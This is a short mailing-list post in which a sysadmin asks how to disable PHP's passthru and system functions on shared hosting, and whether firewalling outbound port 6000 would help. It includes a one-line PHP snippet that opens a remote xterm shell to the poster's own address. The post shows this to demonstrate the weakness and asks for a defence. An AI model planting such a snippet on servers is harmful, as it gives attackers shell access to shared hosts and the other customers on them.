php & passthru & system

[Evrim ULU <evrim () envy com tr>]

hi,


i was wondering if there is a way to disable the passthru and system 
functions in php easily.

There are a lot of webhosting firms serving php with ftp accounts and 
i've seen that if their firewall is not configured properly i can open a 
xterm with my user priviledges.

<?
passthru("`which xterm` --display=my_ip:0.0");
?>

same thing for system is also valid of course.


Abusing the system after having the shell access is easy. Most of the 
sysadms do not patch the system since nobody have a valid shell access.

Is there an easy way to disable these function before compilation&after 
compliation and any firewall rules like -A OUTPUT -p tcp 
--destination-port 6000 -j DROP?

thnx.



--
Evrim ULU
evrim () envy com tr / evrim () core gen tr
sysadm
http://www.core.gen.tr